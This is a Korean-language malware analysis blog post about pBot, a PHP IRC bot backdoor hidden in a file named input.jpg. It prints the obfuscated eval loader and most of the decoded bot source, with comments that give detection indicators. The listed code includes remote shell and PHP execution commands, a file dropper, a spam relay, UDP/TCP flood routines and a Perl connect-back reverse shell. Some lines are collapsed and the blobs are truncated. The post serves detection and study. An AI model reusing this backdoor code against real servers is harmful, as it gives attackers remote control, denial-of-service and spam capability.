

gzinflate + base64 난독화를 이용한 PHP IRC 봇 셸 (pBot)


File : input.jpg
MD5 : 7e3a6b9991f49fafe5e3b9c0ef8c8d1b
크기 : 5.93KB (6,079 바이트)
감염 사이트 : http://www.mhouse.or.kr//bbs/admin/input.jxg
Kaspersky : Backdoor.PHP.Pbot.bl
VirusTotal : 바이러스토탈결과


<?
// Stage-1 loader. The only visible logic is: disable the execution time limit
// (the IRC bot that gets eval()ed below runs indefinitely inside the web server
// process), silence all PHP warnings so nothing leaks into the HTTP response,
// print a marker, then decode + inflate + eval the embedded blob.
set_time_limit(0);
error_reporting(0);
// "ok!" is written to the HTTP response; presumably the operator's liveness
// check that the dropped file executes (nothing else in the listing uses it).
echo "ok!";

// base64(deflate(PHP source)). NOTE: the page truncates the blob at "[생략]"
// ("omitted"), so this string as printed will not decode; the decoded payload
// (class pBot) is listed further down the page. The MD5 in the page header
// identifies the complete original file.
$code = "7Txpc9rItp/9qt5/aOtSY5QQLMB4xjj2HUywLTvGMRi8xBQlpAY
+9R+BRGne7l7V+FwMMsQR0nDUcoLleLavXH0vi2wvVp9/FE25z0AD5kk
/k8bbauLirNkRXXmAr7dyJ2ia9W0g8ob9oiV/2BnWhUWv0GzWR9Kc2/Xh3
1cVjefgAdH7MVfSLnNC9GGfIwz08j4sO2JN8VRK7uFQUPPwqPlOFyw/F
ZXyXH+6r4I89oPrZce3/6IibvmIPwYyhRcMsvfiX5OjSHedfQ5zeEKPN6HpeC[생략]
z8Ty7bcZrsKfZUozZm/wdxFJVo/XB5Y+mPDkjskBVqwTZhpahOI9W3Jwvt7
LQXL9EzHLFoFjhVPz99xBjZVNIPK7mixcId+C0CPJNAbDWYJeojtRdkMJTOu
fLymkTKaq1sip3CrTcoqBHmVvOaJDclsQUTpGLKJEMmLkti4AOLwHcku+4
J/JmwZJkGvmhwhDY/YC3jp+E6LZms+/wc=";

// The classic eval(gzinflate(base64_decode(...))) webshell wrapper; '@' hides any
// error from a malformed blob. Detection: search web roots for this call chain
// (and for the short "<?" open tag in files with an image extension), and match
// the MD5 above. The decoded stage is safe to inspect by replacing eval with echo.
@eval(gzinflate(base64_decode($code)));

eval gzinflate base64_decode Online Decode Tool

 /**
  * pBot — PHP IRC bot / backdoor (Kaspersky: Backdoor.PHP.Pbot.bl per the page header).
  *
  * Behaviour visible in this listing:
  *  - connects to the IRC C2 in $config (server/port/pass), joins $config['chan']
  *    with $config['key'], and announces php_uname(), safe_mode state and the URL of
  *    the infected script (SERVER_NAME + REQUEST_URI) to $config['chan2'];
  *  - accepts commands prefixed with "." from channel members whose IRC vhost equals
  *    $config['hostauth'] (or any host when hostauth is "*") after they authenticate
  *    with ".masuk <password>";
  *  - command set: shell execution (.sexec .exec .passthru .popen .system), PHP eval
  *    (.eval), raw IRC (.raw), perl reverse shell (.conback), file download to disk
  *    (.download), spam relay (.mail .inbox), TCP port check (.pscan), UDP/TCP flood
  *    (.fluud .flood), C2 switch (.ud.server), restart/kill (.restart .mati).
  *
  * Indicators from this sample (for blocking / hunting):
  *  - C2 irc.plasa.com:6667, channel #007 with key "rakitan", nick "Justice" + 5 digits,
  *    owner vhost "Experience.Is.The.Best.Teacher";
  *  - dropper paths /tmp/dc.pl, /var/tmp/dc.pl, ./dc.pl and a backgrounded "perl dc.pl
  *    <ip> <port>" process (the file is unlinked right after launch);
  *  - literal strings usable for YARA: "phpbot 2.0 by; prekelz", "InBox Test",
  *    "#crew@corp. since 2003", "Data Cha0s Connect Back Backdoor", "UdpFlood Started!".
  *
  * Listing caveats: the original line breaks were lost on several lines, so a trailing
  * "//" comment now swallows the code that followed it on the same line (most visibly
  * the whole $config array below); treat this as an analysis artifact, not runnable
  * source. $config['trigger'] is never read — the "." prefix is hard-coded in main().
  * Both secrets are shown as "**", presumably redacted by the poster.
  */
 class pBot
 {
   // C2 parameters. Keys used below: server, port, pass, prefix, maxrand, chan, chan2,
   // key, modes, password, hostauth. (Portuguese comments are the author's.)
   var $config = array("server"=>"irc.plasa.com",  // ip/host da rede                     "port"=>"6667",   // porta da rede                     "pass"=>"**",   // senha da rede                     "prefix"=>"Justice",   // nick do bot                     "maxrand"=>"5",   // quantidade de numero no nick do bot                     "chan"=>"#007",   // canal que os bots vao entrar                     "chan2"=>"#007",  // canal aonde os bots v?o mandar as vulns ao conectar (-n)                     "key"=>"rakitan",      // senha do canal                     "modes"=>"+p",              // modos do bot                     "password"=>"**",           // senha pra acesso (.user SENHA)                     "trigger"=>".",   // prefico dos comandos                     "hostauth"=>"Experience.Is.The.Best.Teacher"   // host dos owners (* for any hostname)                     );
   // Authenticated operators, keyed by the raw IRC prefix string ("nick!user@host").
   var $users = array();
   /**
    * Connect to the C2 and register; never returns normally (main() loops).
    * A failed connect recurses into start() with no delay, i.e. a tight reconnect loop.
    */
   function start()
   {
     if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))        $this->start();
     // Ident/username = prefix + maxrand random digits (rand(), not security-relevant).
     $ident = $this->config['prefix'];
     $alph = range("0","9");
     for($i=0;$i<$this->config['maxrand'];$i++)        $ident .= $alph[rand(0,9)];
     if(strlen($this->config['pass'])>0)        $this->send("PASS ".$this->config['pass']);
     // The USER realname field carries php_uname(): OS/kernel of the victim is leaked
     // to the IRC server on every connect — a usable network signature.
     $this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
     $this->set_nick();
     $this->main();
   }
   /**
    * IRC read loop: keep-alive, post-registration announcement, and command dispatch.
    * Commands are only honoured from a prefix that passed the hostauth + ".masuk" check.
    */
   function main()
   {
     while(!feof($this->conn))
     {
       // One IRC line per iteration, at most 512 bytes.
       $this->buf = trim(fgets($this->conn,512));
       $cmd = explode(" ",$this->buf);
       if(substr($this->buf,0,6)=="PING :")
       {
         $this->send("PONG :".substr($this->buf,6));
       }
       // 001 = RPL_WELCOME: registration done. Set user modes, join the channel, then
       // report host details and the URL of this script to chan2.
       if(isset($cmd[1]) && $cmd[1] =="001")
       {
         $this->send("MODE ".$this->nick." ".$this->config['modes']);
         $this->join($this->config['chan'],$this->config['key']);
         if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
         {
           $safemode = "ON";
         }
         else
         {
           $safemode = "OFF";
         }
         $uname = php_uname();
         $this->privmsg($this->config['chan2'],"uname: $uname (Safe: $safemode)");
         // "Vuln :" line tells the operator where the shell lives. As printed the
         // next line is missing the closing "]" after 'REQUEST_URI' — most likely a
         // transcription error on the page rather than in the sample.
         $this->privmsg($this->config['chan2'],"Vuln :
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI'."");
       }
       // 433 = ERR_NICKNAMEINUSE: pick a fresh random nick.
       if(isset($cmd[1]) && $cmd[1]=="433")
       {
         $this->set_nick();
       }
       // Skip exact repeats of the previous line. $old_buf is unset on the first pass
       // (a notice that error_reporting(0) hides).
       if($this->buf != $old_buf)
       {
         $mcmd = array();
         // $msg  = text after the first " :" (the PRIVMSG payload)
         // $host = full prefix as received, e.g. ":nick!user@host" (login key)
         // $nick = nick without the leading ':'; $vhost = part after '@'
         $msg = substr(strstr($this->buf," :"),2);
         $msgcmd = explode(" ",$msg);
         $nick = explode("!",$cmd[0]);
         $vhost = explode("@",$nick[1]);
         $vhost = $vhost[1];
         $nick = substr($nick[0],1);
         $host = $cmd[0];
         // Accept both ".cmd args" and "<botnick> .cmd args" (addressed form drops
         // the leading nick).
         if($msgcmd[0]==$this->nick)
         {
           for($i=0;$i<count($msgcmd);
           $i++)               $mcmd[$i] = $msgcmd[$i+1];
         }
         else
         {
           for($i=0;$i<count($msgcmd);
           $i++)               $mcmd[$i] = $msgcmd[$i];
         }
         if(count($cmd)>2)
         {
           switch($cmd[1])
           {
             // An operator leaving the network/channel loses the session.
             case "QUIT":                    if($this->is_logged_in($host))
             {
               $this->log_out($host);
             }
             break;
             case "PART":                    if($this->is_logged_in($host))
             {
               $this->log_out($host);
             }
             break;
             // Unauthenticated path: only a sender whose vhost equals hostauth (or any
             // host when hostauth is "*") may log in with ".masuk <password>"
             // ("masuk" = Indonesian "enter"). Password check is a loose "==".
             case "PRIVMSG":                    if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
             {
               if(substr($mcmd[0],0,1)==".")
               {
                 switch(substr($mcmd[0],1))
                 {
                   case "masuk":                               if($mcmd[1]==$this->config['password'])
                   {
                     $this->log_in($host);
                   }
                   else
                   {
                     // Wrong password: insult sent as a NOTICE to the channel.
                     $this->notice($this->config['chan'],"[\2Auth\2]: Tahede Ngana $nick GOBLOK!!");
                   }
                   break;
                 }
               }
             }
             // Authenticated command set. "\2" in replies is IRC bold (chr(2)).
             elseif($this->is_logged_in($host))
             {
               if(substr($mcmd[0],0,1)==".")
               {
                 switch(substr($mcmd[0],1))
                 {
                   // .restart — drop the connection and reconnect (picks up .ud.server).
                   case "restart":                                $this->send("QUIT :restart commando from $nick");
                   fclose($this->conn);
                   $this->start();
                   break;
                   // .mail <to> <from> <subject> <body...> — open mail relay with a
                   // forged From: header; body is $msg from the first occurrence of
                   // the 5th word onward. (The trailing "if" on the next line is part
                   // of the collapsed comment — see class docblock.)
                   case "mail": //mail to from subject message                                if(count($mcmd)>4)
                   {
                     $header = "From: <".$mcmd[2].">";
                     if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
                     {
                       $this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
                     }
                   }
                   break;
                   // .safe — report safe_mode state.
                   case "safe":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
                   break;
                   // .inbox <addr> — deliverability test: mails the victim's IP,
                   // server software, uname and the shell URL to <addr> from a random
                   // inbox<md5>@xdevil.org sender. Leaks host details off-box.
                   case "inbox": //teste inbox                               if(isset($mcmd[1]))
                   {
                     $token = md5(uniqid(rand(), true));
                     $header = "From: <inbox".$token."@xdevil.org>";
                     $a = php_uname();
                     $b = getenv("SERVER_SOFTWARE");
                     $c = gethostbyname($_SERVER["HTTP_HOST"]);
                     if(!mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln:
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
                     {
                       $this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
                     }
                   }
                   break;
                   // .conback <ip> <port> — perl reverse shell, see conback().
                   case "conback":                               if(count($mcmd)>2)
                   {
                     $this->conback($mcmd[1],$mcmd[2]);
                   }
                   break;
                   // .dns <ip|name> — reverse lookup for dotted quads, forward otherwise.
                   case "dns":                                if(isset($mcmd[1]))
                   {
                     $ip = explode(".",$mcmd[1]);
                     if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
                     {
                       $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
                     }
                   }
                   break;
                   // .info / .vunl (intentional fall-through) — uname, safe_mode, shell URL.
                   case "info":                            case "vunl":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $uname = php_uname();
                   $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
                   $this->privmsg($this->config['chan'],"[\2vuln\2]:
http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
                   break;
                   // .bot — version banner (good detection string).
                   case "bot":                               $this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; prekelz");
                   break;
                   // .uname — same as .info without the URL.
                   case "uname":                               if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                   {
                     $safemode = "on";
                   }
                   else
                   {
                     $safemode = "off";
                   }
                   $uname = php_uname();
                   $this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
                   break;
                   // .rndnick — new random nick.
                   case "rndnick":                                $this->set_nick();
                   break;
                   // .raw <line...> — send an arbitrary raw IRC line to the server.
                   case "raw":                               $this->send(strstr($msg,$mcmd[1]));
                   break;
                   // .eval <php...> — arbitrary PHP in the web server process; the
                   // result is discarded ($eval is never used), so output only
                   // surfaces if the code itself sends it somewhere.
                   case "eval":                              $eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
                   break;
                   // .sexec <cmd...> — shell_exec(), full output relayed line by line.
                   // $command is everything after ".sexec ", passed to the shell unquoted.
                   case "sexec":                               $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = shell_exec($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   // .exec <cmd...> — exec() returns only the last output line, so at
                   // most one line reaches the channel.
                   case "exec":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = exec($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   // .passthru <cmd...> — passthru() writes straight to the HTTP
                   // response and returns no output string, so nothing is relayed
                   // to IRC; the output ends up in the web response of this request.
                   case "passthru":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = passthru($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   // .popen <cmd...> — streams output via a pipe. NOTE: there is no
                   // "break" after pclose(), so execution falls through into "system"
                   // and the same command is run a second time.
                   case "popen":                                if(isset($mcmd[1]))
                   {
                     $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                     $this->privmsg($this->config['chan'],"[\2popen\2]: $command");
                     $pipe = popen($command,"r");
                     while(!feof($pipe))
                     {
                       $pbuf = trim(fgets($pipe,512));
                       if($pbuf != NULL)                                         $this->privmsg($this->config['chan'],"     : $pbuf");
                     }
                     pclose($pipe);
                   }
                   // .system <cmd...> — system() echoes output to the HTTP response
                   // and returns the last line, so at most one line is relayed.
                   case "system":                                $command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
                   $exec = system($command);
                   $ret = explode("\n",$exec);
                   for($i=0;$i<count($ret);
                   $i++)                                   if($ret[$i]!=NULL)                                      $this->privmsg($this->config['chan'],"      : ".trim($ret[$i]));
                   break;
                   // .pscan <host> <port> — TCP connect test with a 15 s timeout;
                   // the victim becomes a scanner for the operator.
                   case "pscan": // .pscan 127.0.0.1 6667                                if(count($mcmd) > 2)
                   {
                     if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))                                      $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
                     else                                      $this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
                   }
                   break;
                   // .ud.server <server> <port> [password] — retarget the C2 for the
                   // next reconnect (.restart). Because of the "$mcmcd" typo the
                   // password branch is unreachable and 'pass' is never updated.
                   case "ud.server": // .ud.server <server> <port> [password]                                if(count($mcmd)>2)
                   {
                     $this->config['server'] = $mcmd[1];
                     $this->config['port'] = $mcmd[2];
                     if(isset($mcmcd[3]))
                     {
                       $this->config['pass'] = $mcmd[3];
                       $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
                     }
                     else
                     {
                       $this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
                     }
                   }
                   break;
                   // .download <url> <localpath> — write primitive for dropping further
                   // tools: the local file is opened (and truncated) first, then the URL
                   // is read with file() (needs allow_url_fopen). The copy loop runs one
                   // index past the end; the undefined read is hidden by error_reporting(0).
                   case "download":                                if(count($mcmd) > 2)
                   {
                     if(!$fp = fopen($mcmd[2],"w"))
                     {
                       $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
                     }
                     else
                     {
                       if(!$get = file($mcmd[1]))
                       {
                         $this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
                       }
                       else
                       {
                         for($i=0;$i<=count($get);
                         $i++)
                         {
                           fwrite($fp,$get[$i]);
                         }
                         $this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
                       }
                       fclose($fp);
                     }
                   }
                   else
                   {
                     $this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file");
                   }
                   break;
                   // .mati ("die") — QUIT and terminate the PHP process.
                   case "mati":                                $this->send("QUIT :die command from $nick");
                   fclose($this->conn);
                   exit;
                   // .keluar ("exit") — drop the operator's session.
                   case "keluar":                                $this->log_out($host);
                   $this->privmsg($this->config['chan'],"[\2auth\2]: $nick ekhuuuuuuuu!");
                   break;
                   // .fluud <host> <packetsize> <seconds> — UDP flood, see udpflood().
                   case "fluud":                                if(count($mcmd)>3)
                   {
                     $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
                   }
                   break;
                   // .flood <host> <packets> <packetsize> <port> <delay> — TCP flood.
                   case "flood":                                if(count($mcmd)>5)
                   {
                     $this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
                   }
                   break;
                 }
               }
             }
             break;
           }
         }
       }
       $old_buf = $this->buf;
     }
     // Server closed the connection: reconnect from scratch.
     $this->start();
   }
   // Write one raw IRC line (CRLF-terminated) to the C2 socket.
   function send($msg)
   {
     fwrite($this->conn,"$msg\r\n");
   }
   // JOIN with optional channel key.
   function join($chan,$key=NULL)
   {
     $this->send("JOIN $chan $key");
   }
   function privmsg($to,$msg)
   {
     $this->send("PRIVMSG $to :$msg");
   }
   function notice($to,$msg)
   {
     $this->send("NOTICE $to :$msg");
   }
   // Session state is a plain map keyed by the raw IRC prefix (":nick!user@host");
   // entries are removed only by .keluar, QUIT or PART of that same prefix.
   function is_logged_in($host)
   {
     if(isset($this->users[$host]))        return 1;
     else        return 0;
   }
   function log_in($host)
   {
     $this->users[$host] = true;
   }
   function log_out($host)
   {
     unset($this->users[$host]);
   }
   /**
    * Choose a nick from the web server type + prefix + maxrand random digits.
    * As listed only the "iis" branch adds a marker ("I"); the apache/xitami/default
    * markers are empty strings here — possibly non-printable characters stripped by
    * the page, so do not rely on the exact nick shape for detection.
    */
   function set_nick()
   {
     if(isset($_SERVER['SERVER_SOFTWARE']))
     {
       if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))           $this->nick = "";
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))           $this->nick = "I";
       elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))           $this->nick = "";
       else           $this->nick = "";
     }
     else
     {
       $this->nick = "";
     }
     $this->nick .= $this->config['prefix'];
     for($i=0;$i<$this->config['maxrand'];$i++)        $this->nick .= mt_rand(0,9);
     $this->send("NICK ".$this->nick);
   }
   /**
    * UDP flood: for $time seconds, open a new UDP socket to $host on a random port
    * 0..6000 and write one $packetsize-byte random payload. chr(mt_rand(1,256))
    * wraps 256 to chr(0). A failed fsockopen() is not checked (fwrite on false is
    * silenced), and the reported MB/s assumes every write succeeded.
    */
   function udpflood($host,$packetsize,$time)
   {
     $this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
     $packet = "";
     for($i=0;$i<$packetsize;$i++)
     {
       $packet .= chr(mt_rand(1,256));
     }
     $timei = time();
     $i = 0;
     while(time()-$timei < $time)
     {
       $fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
       fwrite($fp,$packet);
       fclose($fp);
       $i++;
     }
     $env = $i * $packetsize;
     $env = $env / 1048576;
     $vel = $env / $time;
     $vel = round($vel);
     $env = round($env);
     $this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
   }
   /**
    * TCP flood: $packets connections to $host:$port, one random $packetsize-byte
    * payload each, sleeping $delay seconds between them. Aborts (reporting the
    * errno) on the first connect failure.
    */
   function tcpflood($host,$packets,$packetsize,$port,$delay)
   {
     $this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
     $packet = "";
     for($i=0;$i<$packetsize;$i++)        $packet .= chr(mt_rand(1,256));
     for($i=0;$i<$packets;$i++)
     {
       if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
       {
         $this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
         return 0;
       }
       else
       {
         fwrite($fp,$packet);
         fclose($fp);
       }
       sleep($delay);
     }
     $this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
   }
   /**
    * Reverse shell: write the embedded base64 perl script ("Data Cha0s Connect Back
    * Backdoor", decoded further down the page) to disk, launch it in the background
    * with the operator's $ip $port, and delete the file immediately.
    *
    * Forensics: the on-disk dropper lives only for the duration of passthru(), so
    * the lasting artifacts are a "perl .../dc.pl <ip> <port>" process whose script
    * file is already unlinked, and its outbound TCP connection to $ip:$port.
    * Note the /var/tmp and "." branches are two independent "if"s, not an
    * "elseif": when /tmp is unwritable but both of those are writable, the shell
    * is launched twice. $ip/$port are interpolated into the shell command unquoted.
    */
   function conback($ip,$port)
   {
     $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
     // Truncated in this listing ("[생략]"); the visible head decodes to
     // "#!/usr/bin/perl / use Socket; / print "Da..." and the visible tail to
     // open(STDERR,">&SERVER") followed by "exe...", i.e. stdio bound to the socket.
     $dc_source = "
IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRh
dGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkd
WWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQo
gIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iO
w
[생략] PiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZW
lsqXSBEYXRhY2hlZFxuXG4iOw==";
     if (is_writable("/tmp"))
     {
       if (file_exists("/tmp/dc.pl"))
       {
         unlink("/tmp/dc.pl");
       }
       $fp=fopen("/tmp/dc.pl","w");
       fwrite($fp,base64_decode($dc_source));
       passthru("perl /tmp/dc.pl $ip $port &");
       unlink("/tmp/dc.pl");
     }
     else
     {
       if (is_writable("/var/tmp"))
       {
         if (file_exists("/var/tmp/dc.pl"))
         {
           unlink("/var/tmp/dc.pl");
         }
         $fp=fopen("/var/tmp/dc.pl","w");
         fwrite($fp,base64_decode($dc_source));
         passthru("perl /var/tmp/dc.pl $ip $port &");
         unlink("/var/tmp/dc.pl");
       }
       if (is_writable("."))
       {
         if (file_exists("dc.pl"))
         {
           unlink("dc.pl");
         }
         $fp=fopen("dc.pl","w");
         fwrite($fp,base64_decode($dc_source));
         passthru("perl dc.pl $ip $port &");
         unlink("dc.pl");
       }
     }
   }
 }
 // Entry point of the decoded stage: start() connects to the C2 and never returns,
 // so one HTTP request to the dropped file turns into a long-lived bot process
 // (set_time_limit(0) in the loader is what allows this).
 $bot = new pBot;
 $bot->start();
 

#!/usr/bin/perl
# Stage-2 payload used by pBot::conback(): the head of its base64 "dc_source" blob
# decodes to exactly these lines. conback() writes it to /tmp/dc.pl (or /var/tmp/dc.pl,
# or ./dc.pl), runs "perl dc.pl <host> <port> &" and unlinks the file at once.
# The page omits the middle of the script; the visible tail of the blob decodes to
# open(STDERR,">&SERVER") followed by "exe...", consistent with a socket-backed shell.
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
# Only the host argument is required; conback() always passes host and port.
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}

일부 코드 생략 !!

}
print "[*] Datached\n\n";

Decode 결과물.zip


Decode : 바이러스토탈결과

* 디코딩 결과물(zip)에는 암호가 설정되어 있습니다. (비밀댓글을 남겨 주시면 암호를 알려드리겠습니다.)